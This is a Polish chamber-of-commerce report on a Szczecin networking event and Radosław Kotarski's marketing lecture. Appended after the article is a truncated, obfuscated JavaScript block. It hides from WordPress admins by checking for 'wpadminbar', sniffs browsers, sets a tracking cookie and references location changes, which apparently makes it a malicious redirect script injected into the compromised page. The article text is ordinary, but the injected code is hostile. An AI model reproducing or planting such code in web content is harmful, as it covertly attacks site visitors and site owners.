Włam się do mózgu swojej firmy – Relacja z wykładu Radka Kotarskiego | Północna Izba Gospodarcza w Koszalinie

Nowoczesna formuła, bardzo interesujący gość oraz cała sala Hotelu Radisson Blu w Szczecinie wypełniona przedsiębiorcami chętnymi do rozmów na temat gospodarki oraz swojej działalności. 14 marca odbyła się pierwsza odsłona nowej inicjatywy Północnej Izby Gospodarczej. Wielka wymiana wizytówek okazała się sukcesem o czym świadczy zarówno frekwencja jak i pozytywne opinie o wydarzeniu. Wielkie wrażenie zrobił wykład Radosława Kotarskiego. Znany prezenter, dziennikarz i wydawca przedstawił się jako przedsiębiorca, a jego rady będzie można praktycznie stosować w codziennej działalności.

 

Wiceprezes Borowy: Radek Kotarski tchnął nową energię w nasze biznesy

Najnowsza inicjatywa Północnej Izby Gospodarczej w Szczecinie zaskakiwała niecodzienną formułą. Eksperyment okazał się dużym sukcesem. W pierwszej części spotkania przedsiębiorcy zgromadzeni na Sali mieli 15 sekund na przedstawienie się i zaprezentowanie swojego biznesu. Pierwsza osoba odczuwała delikatną tremę, ale później właściwie każdy z obecnych chciał zabrać głos. Druga część spotkania to wykład Radosława Kotarskiego. YouTuber, prezenter telewizyjny, wykładowca i wydawca z dużym zaangażowaniem mówił o tym jak odpowiednio kreować swój marketing by wywołać zainteresowanie produktem lub usługami. Trzecia część to networking czyli okazja do dyskusji i integrowania się przedsiębiorców zrzeszonych w Północnej Izbie Gospodarczej.

Według Macieja Borowego, Wiceprezesa PIG inicjatywa odniosła sukces: – Północna Izba Gospodarcza w Szczecinie to Izba osób, które się znają. Chcielibyśmy by te znajomości miały charakter nie tylko towarzyski, ale i biznesowy. Nasze dzisiejsze spotkanie miało dzisiaj charakter luźny, ale była też okazja do rozmowy o firmach i działalności. Pan Radek Kotarski zapewnił wysoki poziom merytoryczny całego spotkania, przedsiębiorcy poczuli się na tyle odważni żeby dyskutować, mówić o sobie, często polemizować. Tego typu spojrzenie, jak prezentuje Pan Radosław, czyli nowa fala marketingu jest bardzo inspirująca i twórcza dla przedsiębiorców i jest w stanie tchnąć nową energię w nasze biznesy – mówił Maciej Borowy.

O czym mówił Koterski? O co pytali przedsiębiorcy?

Nasze wydarzenie nie odbyłoby się gdyby nie wsparcie firm z naszego regionu oraz instytucji współpracujących blisko z Północną Izbą Gospodarczą w Szczecinie. Głos zabrali przedstawiciele m.in. firmy Prodmar, Strefy 3L, Kina Helios, Zachodniopomorskiej Agencji Rozwoju Regionalnego czy Polskiej Fundacji Przedsiębiorczości. Część w której nasi członkowie mieli 15 sekund na zaprezentowanie swojej firmy pokazała jak szeroki przekrój usług oferują przedsiębiorcy zrzeszeni w Izbie. Nie brakowało momentów uśmiechu i nie brakowało głosów, że nasza inicjatywa zaowocuje realnymi współpracami biznesowymi: – Cieszy to, że tak wiele osób jest spragnionych wiedzy jak prowadzić firmę. Przedsiębiorcy szukają inspiracji jak się rozwijać. W ofercie ZARR są propozycje jak zainwestować w edukacyjne kwestie rozwojowe, ale i oferujemy poręczenia, pożyczki czy możliwość korzystania z instrumentów finansowych. Pomagamy w pozyskaniu dofinansowania bankowego, niebawem uruchomimy ofertę pożyczkową. Duże znaczenie ma także system start-upowy dla firm, które właśnie mogą być tak kwalifikowane – mówi Robert Michalski, Prezes Zachodniopomorskiej Agencji Rozwoju Regionalnego. – Współpraca z Izbą to win-win, bo odpowiadamy na zapotrzebowanie biznesu konkretną ofertą, a Izba to doskonała platforma kontaktu i komunikacji – dodał Prezes ZARR.

Wykład motywacyjny Radosława Kotarskiego okazał się bardzo interesujący i inspirujący. Kotarski zasłynął z popularyzacji nauki i historii na swoim kanale na YouTube „Polimaty”. Prowadził także w TVP2 program „Podróże z historią” oraz wydał serię bestsellerowych książek. Mało kto zna jednak tę osobowość medialną jako przedsiębiorcę, który również radził sobie ze skomplikowanymi, rynkowymi meandrami. Podczas spotkania z przedsiębiorcami Północnej Izby Gospodarczej chętnie dzielił się swoimi doświadczeniami, obserwacjami i wiedzą: – Zawsze zastanawiałem się jak wywołać szybsze bicie serca swoim hasłem promocyjnym już od pierwszego usłyszenia i wtedy wpadłem na koncepcję znaną w Ameryce, która każe nam patrzeć inaczej na produkty i przedsiębiorców. Niesamowite jest to, że w momencie kiedy uda nam się to zastosować w praktyce, to inaczej spojrzycie na swoją działalność. Ta koncepcja to trzy pytania – Co? Jak? Oraz Dlaczego? – bardzo proste pytania. Każdy z Państwa bez problemu powie jakie ma produkty i usługi i nie wystarczy nam 15 sekund by o wszystkich produktach porozmawiać. Należy bardziej krytycznie spojrzeć na to, co robimy. Większość skupia się na „Co?”. Większość marketingu i komunikacji opiera się na tym, co robimy na co dzień. Spróbujcie jednak skupić się Państwo na tym by komunikować światu jak to robicie albo jeszcze bardziej dlaczego – radził Kotarski.

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m